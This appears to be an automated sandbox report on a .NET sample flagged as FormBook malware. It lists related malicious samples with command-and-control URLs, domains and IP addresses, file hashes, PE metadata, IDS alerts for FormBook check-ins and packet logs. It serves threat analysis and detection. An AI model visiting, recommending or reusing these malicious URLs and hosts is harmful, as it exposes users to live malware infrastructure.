	SWD0004 PO06350.exe	Get hash	malicious	Browse	www.lychee.solutions/tgdh/?nPvXk=UlKbuswgrfoGxTwl3lQ89d1PQ+7W2P8S37SPW6DNTgO9xwcGerRxB5UERPQKgLKeWhUdNon6Nw==&Uv6tJj=6liX-hYp_T1
	fooYgfbxno.exe	Get hash	malicious	Browse	www.chambaultfleurs.com/ocgr/?lfvx9=JFNTlvkP_&P2Jl4=TZNys7210trfg8O8WBMuzy6C02I8maceBl4kNVlEZuNH+N4fd/TFP34Py3WDgrqbJJxT
	Nuevo pedido _WJO-002.exe	Get hash	malicious	Browse	www.carnetdechef.online/vadq/?iR-P=A13qLmg5KBHO8E7Ywf1ca7zjyP5ZGUXBVRHStzxp2KFbzFZ4ZcYnPcYCtreDAgq50Jtm&k484GH=aT5x4jD0-JxPk65P
	INfP08H23s.exe	Get hash	malicious	Browse	www.nous-citoyens.com/bs8f/?6lxXp46=9+dy+w/GjnPuoymhQgR8JE3EQuBRJzQKZBkeRAKiuEdkQaLIpnn+mMupMqxE6sbtT0z5JA9nRQ==&6l=2d_TJTyxVJh
	5P22020005-MEDUK1317768_CBL02.xlsx	Get hash	malicious	Browse	www.tinyhouse.contact/ud5f/?OJEPA=JpVhGz00S&cp0=BF3a16MkXZzVy5qrl/DHZmnc7dJcWa7bfgOCLcjb0yE+yDraIEdJFhhOIcD3uUx3hcOjSA==
	bqOzwqaUEQ.exe	Get hash	malicious	Browse	www.univerdelacreation.com/b86g/?h6_PqZ9=lSrKz+sKevrxqSmLN5Z9TUK9Bdk49DrIZ+MtK6xZIEcDACethHTtdFgVtUlB0dzbEppB&s4=cPXl8RupZ2CTbd2
	PI_2992.xlsx	Get hash	malicious	Browse	www.univerdelacreation.com/b86g/?4hPt=lSrKz+sPeor1qCqHP5Z9TUK9Bdk49DrIZ+U9W5tYMkcCAzyrmXChLBYXuxJXwN3oPq0xWQ==&ep=NH_XnpZhrbd
	SecuriteInfo.com.Variant.Strictor.270431.23718.exe	Get hash	malicious	Browse	www.carnetdechef.online/vadq/?mR-DQd=A13qLmg5KBHO8E7Ywf1ca7zjyP5ZGUXBVRHStzxp2KFbzFZ4ZcYnPcYCtrepfQa5wLlm&iFQTL=0L3tdR1x
	VmZ5lRO033.exe	Get hash	malicious	Browse	www.nous-citoyens.com/bs8f/?LvZ=1byLsjE0&6lg8c=9+dy+w/GjnPuoymhQgR8JE3EQuBRJzQKZBkeRAKiuEdkQaLIpnn+mMupMpdt5snVaXGv
	Nueva cotizaci#U00f3n185225772.exe	Get hash	malicious	Browse	www.spa-avignon.com/g5so/?9r=7nH09&2dYlX=fpTMlvQ4DQ4ENqaV12PsKX3T9VhwiEi/Lh0NPHQIY6H6NWMQ+3y+4pLZeI0ITQiK2/8c
	SecuriteInfo.com.Trojan.MSIL.AgentTesla.LLD.MTB.13803.exe	Get hash	malicious	Browse	www.pearl-design.art/vmqm/?d8V=_6zpCHX&D6=qNg0FTx4aVS/wG+9qHm/3HOl9nS2z/PLxqYFcJeFACfsXVv1N6osA3FbUq9JR4EJtQqnWPPJCA==
	ultDr2ofCk.exe	Get hash	malicious	Browse	www.nous-citoyens.com/bs8f/?9r9x=9+dy+w/GjnPuoymhQgR8JE3EQuBRJzQKZBkeRAKiuEdkQaLIpnn+mMupMqxE6sbtT0z5JA9nRQ==&X8=mFN078RpgN5
	SecuriteInfo.com.W32.AIDetectNet.01.2884.exe	Get hash	malicious	Browse	www.pearl-design.art/vmqm/?crqXB=1b08lfmx74x0SpZ&k0DL=qNg0FTx4aVS/wG+9qHm/3HOl9nS2z/PLxqYFcJeFACfsXVv1N6osA3FbUpRZNJYyqlD2

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.timinis23.com	Ze3uEgxQZ3.exe	Get hash	malicious	Browse	199.192.23.166
	LibertyInsuranceCustomerInvoice.doc.xlsx	Get hash	malicious	Browse	199.192.23.166
	shipping advice#202207.exe	Get hash	malicious	Browse	199.192.23.166
	DOCUMENTS.exe	Get hash	malicious	Browse	199.192.23.166
	RFQ.exe	Get hash	malicious	Browse	199.192.23.166
	HBL+MBL SHIPPING DOCUMENTS.exe	Get hash	malicious	Browse	199.192.23.166
	SHIPPING ADVICE#ASEANS.exe	Get hash	malicious	Browse	199.192.23.166
	pre alert documents.exe	Get hash	malicious	Browse	199.192.23.166

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	RE Nueva orden de compra PO-(SAM115903) PEDID.exe	Get hash	malicious	Browse	162.159.129.233
	https://jay-southvalleychamber.formtitan.com/ft99044de81655136711886	Get hash	malicious	Browse	172.67.38.66
	https://luxeincentives.aweb.page/p/96ebd35b-ac3a-4671-88ce-36ccb068b1ef	Get hash	malicious	Browse	104.16.51.111
	SecuriteInfo.com.W32.AIDetectNet.01.3298.exe	Get hash	malicious	Browse	104.19.152.30
	https://view.genial.ly/62b1fb0a1c995900190f57d7	Get hash	malicious	Browse	104.26.0.100
	https://view.genial.ly/62b1fb0a1c995900190f57d7	Get hash	malicious	Browse	172.67.70.233
	https://secure.payment-gateway.microransom.us/XY1Vvek9HMHdTM0pvVTNkeVJVZGhPR2swT1RVclNsQlFWaXN3VEhkMFUyeFJZbVpGWVRRNU9VUTFVMVpRU1ZabVpXWlRaVzE1UVdndmIwSXpWR2xJY0hsT01IUXhRMGg1UjJkRFNuTnVjV1JYUTJoTFRXSmtZbmxaT0dsV0x6QjBkVEJDYURCdlNsUXJSa1p1Vlhnck1FeHNVbFowVjNCWVIxVjZOVkZzTjBkRlVYQkxiMnAzTmxONlFXSm9SV1ZNWmpSMVZraENZVWhzV2xnMU5UTTNkR1pPUTJSSlNGVkVTa0p2UFMwdFRIVlJaazl2Y2tOMllXNWFOWEJUWVZOVmF6ZzJaejA5LS1mMzhlZDBhYWZmMDg3YmY4Mzc1MGM1ZTUyMmEzYjQyYTQ0MDNkNDJl?cid=1215110915	Get hash	malicious	Browse	104.17.243.204
	BiaXEROX-Printer.html	Get hash	malicious	Browse	188.114.97.3
	https://navettadesign.carrd.co/	Get hash	malicious	Browse	172.64.144.211
	7zWU13ZU7l.exe	Get hash	malicious	Browse	23.227.38.74
	TNTINVOICE.exe	Get hash	malicious	Browse	172.67.212.129
	http://istopro.com/	Get hash	malicious	Browse	104.17.25.14
	https://r20.rs6.net/tn.jsp?t=qcuzd54ab.0.0.sqy9yutab.0&1d=preview&r=3&p=https://75sq6z.codesandbox.io/?nl=Z2FsZW56b3NraWdAc2Fza3BvbHl0ZWNoLmNh	Get hash	malicious	Browse	172.64.144.239
	https://tinyurl.com/36rm89dd	Get hash	malicious	Browse	104.16.126.175
	https://express.adobe.com/page/PhpsRo7GlgFTQ/	Get hash	malicious	Browse	104.18.6.145
	DxWms2NQlP.exe	Get hash	malicious	Browse	162.159.135.233
	http://sdfdsfsd.mylogisoft.com	Get hash	malicious	Browse	104.26.6.173
	SecuriteInfo.com.Variant.Tedy.147471.27671.exe	Get hash	malicious	Browse	162.159.133.233
	Payment_Advice_USD 64.645,00.xlsx	Get hash	malicious	Browse	104.21.27.240
	cryptoapp.apk	Get hash	malicious	Browse	104.18.115.97
OVHFR	pGXHTm4Eys.dll	Get hash	malicious	Browse	54.37.228.122
	J085cGCgSg.dll	Get hash	malicious	Browse	54.37.228.122
	2022-06-13_0811.xls	Get hash	malicious	Browse	94.23.45.86
	1QfmqqMML3.dll	Get hash	malicious	Browse	94.23.45.86
	vVmCOLVRTE.dll	Get hash	malicious	Browse	94.23.45.86
	SecuriteInfo.com.W32.AIDetectNet.01.14273.exe	Get hash	malicious	Browse	164.132.235.17
	UaxvATwx1nW9e5V2.dll.dll	Get hash	malicious	Browse	54.37.228.122
	fD7CVy6TFScmsyoWY2u6VrZaGtD.dll.dll	Get hash	malicious	Browse	94.23.45.86
	0jpfaTuRcJgom.dll.dll	Get hash	malicious	Browse	54.37.228.122
	UaxvATwx1nW9e5V2.dll.dll	Get hash	malicious	Browse	54.37.228.122
	Cob8cQfffR2tYj.dll.dll	Get hash	malicious	Browse	94.23.45.86
	fD7CVy6TFScmsyoWY2u6VrZaGtD.dll.dll	Get hash	malicious	Browse	94.23.45.86
	sBYnRG4PnM4MZYX5XAASWphom7G2.dll.dll	Get hash	malicious	Browse	94.23.45.86
	R1du.dll.dll	Get hash	malicious	Browse	54.37.228.122
	LoiTfzm62q0XCCPK.dll.dll	Get hash	malicious	Browse	54.37.228.122
	MUIDqt0DbXRppDS.dll.dll	Get hash	malicious	Browse	54.37.228.122
	VGBVX9EsTyllaKi.dll.dll	Get hash	malicious	Browse	54.37.228.122
	rOASkDCepboLkSLvYw7.dll.dll	Get hash	malicious	Browse	54.37.228.122
	https://view.genial.ly/62b1fb0a1c995900190f57d7	Get hash	malicious	Browse	54.39.102.34
	https://view.genial.ly/62b1fb0a1c995900190f57d7	Get hash	malicious	Browse	54.39.102.34

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\e6o7hKFmfC.exe.log

Download File

Process:	C:\Users\user\Desktop\e6o7hKFmfC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Temp\DB1

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.936002764708603
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	e6o7hKFmfC.exe
File size:	450048
MD5:	8415dbf0bb48732513140ab0502b0fd2
SHA1:	d41419d8fdb4bc302d5a89ee8ff65b849e2f23c0
SHA256:	14da7c334b73a6bc5cb1862520b51255b5cbfe207ff2ec8d1993edf9c84d1c58
SHA512:	c5bbe39b8e7e8b34ab17c34ae2b2e1a63ea65f2919fc84bb3d07457cb9a074f59df2046555b03487e14a2aef22d85638d4be9cb1c4f48135bfacb6b0f5a023f2
SSDEEP:	12288:prl8tTSkBtRUTmqAy2jcJspiAw3TvMn6Q2yN:prl8tTNqmj2sEfvMqyN
TLSH:	69A41242A79D8B23C7BE2BF811D6424003B5B519A165F74FCDD3A0C65E6AF4486C2F2B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............0.................. ........@.. .......................@............@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x46f40e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x62B1FDAE [Tue Jun 21 17:19:42 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6f3bc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x70000	0x390	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x72000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x6d414	0x6d600	False	0.9496852678571429	data	7.945706696935657	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x70000	0x390	0x400	False	0.3818359375	data	2.9023029837775387	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x72000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x70058	0x334	data

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.534.102.136.18049872802031449 06/21/22-21:09:19.051846	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49872	80	192.168.2.5	34.102.136.180
192.168.2.5154.94.246.22649922802031453 06/21/22-21:09:31.770924	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49922	80	192.168.2.5	154.94.246.226
192.168.2.5154.94.246.22649922802031412 06/21/22-21:09:31.770924	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49922	80	192.168.2.5	154.94.246.226
192.168.2.534.102.136.18049872802031453 06/21/22-21:09:19.051846	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49872	80	192.168.2.5	34.102.136.180
192.168.2.5154.94.246.22649922802031449 06/21/22-21:09:31.770924	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49922	80	192.168.2.5	154.94.246.226
192.168.2.534.102.136.18049872802031412 06/21/22-21:09:19.051846	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49872	80	192.168.2.5	34.102.136.180

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 21, 2022 21:08:50.946398020 CEST	49855	80	192.168.2.5	199.192.23.166
Jun 21, 2022 21:08:51.121412039 CEST	80	49855	199.192.23.166	192.168.2.5
Jun 21, 2022 21:08:51.121684074 CEST	49855	80	192.168.2.5	199.192.23.166
Jun 21, 2022 21:08:51.122010946 CEST	49855	80	192.168.2.5	199.192.23.166
Jun 21, 2022 21:08:51.296606064 CEST	80	49855	199.192.23.166	192.168.2.5
Jun 21, 2022 21:08:51.379797935 CEST	80	49855	199.192.23.166	192.168.2.5
Jun 21, 2022 21:08:51.379832029 CEST	80	49855	199.192.23.166	192.168.2.5
Jun 21, 2022 21:08:51.379936934 CEST	49855	80	192.168.2.5	199.192.23.166
Jun 21, 2022 21:08:53.542970896 CEST	49855	80	192.168.2.5	199.192.23.166
Jun 21, 2022 21:08:53.718503952 CEST	80	49855	199.192.23.166	192.168.2.5
Jun 21, 2022 21:09:03.603009939 CEST	49860	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:03.619920969 CEST	80	49860	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.622109890 CEST	49860	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:03.622292995 CEST	49860	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:03.622339010 CEST	49860	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:03.623002052 CEST	49861	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:03.639054060 CEST	80	49860	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.639750004 CEST	80	49860	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.639769077 CEST	80	49861	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.639847040 CEST	49860	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:03.639898062 CEST	49861	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:03.644167900 CEST	49861	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:03.644670010 CEST	49862	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:03.661067009 CEST	80	49861	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.661091089 CEST	80	49861	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.661103964 CEST	80	49861	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.661114931 CEST	80	49861	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.661127090 CEST	80	49861	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.661138058 CEST	80	49861	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.661149979 CEST	80	49861	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.661161900 CEST	80	49861	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.661174059 CEST	80	49861	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.661185026 CEST	80	49861	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.661240101 CEST	49861	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:03.661293030 CEST	49861	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:03.661317110 CEST	49861	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:03.661432981 CEST	80	49862	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.661550045 CEST	49862	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:03.661695957 CEST	49862	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:03.668092012 CEST	80	49861	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.668119907 CEST	80	49861	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.668137074 CEST	80	49861	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.668149948 CEST	80	49861	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.668160915 CEST	80	49861	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.668174982 CEST	80	49861	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.668251038 CEST	49861	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:03.668318987 CEST	49861	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:03.668323994 CEST	49861	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:03.668601036 CEST	49861	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:03.678415060 CEST	80	49862	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.683218956 CEST	80	49862	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.683648109 CEST	49862	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:03.700510979 CEST	80	49862	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.907368898 CEST	80	49862	188.114.96.6	192.168.2.5
Jun 21, 2022 21:09:03.907507896 CEST	49862	80	192.168.2.5	188.114.96.6
Jun 21, 2022 21:09:08.763892889 CEST	49863	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.792912006 CEST	80	49863	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.793060064 CEST	49863	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.793270111 CEST	49863	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.793330908 CEST	49863	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.793898106 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.822644949 CEST	80	49863	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.822722912 CEST	80	49863	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.822756052 CEST	49863	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.822767019 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.822834015 CEST	49863	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.822882891 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.825153112 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.825783968 CEST	49865	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.851689100 CEST	80	49863	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.851782084 CEST	49863	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.854170084 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.854198933 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.854213953 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.854232073 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.854281902 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.854358912 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.854391098 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.854408026 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.854424953 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.854453087 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.854469061 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.854481936 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.854537010 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.854556084 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.854600906 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.854602098 CEST	80	49865	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.854617119 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.854619026 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.854715109 CEST	49865	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.854872942 CEST	49865	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.863214016 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.863430977 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.884362936 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.884418011 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.884448051 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.884459019 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.884497881 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.884506941 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.884531021 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.884560108 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.884588957 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.884610891 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.884859085 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.884891033 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.884917021 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.884922981 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.884941101 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.884944916 CEST	80	49864	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.884958982 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.884974957 CEST	80	49864	213.186.33.5	192.168.2.5
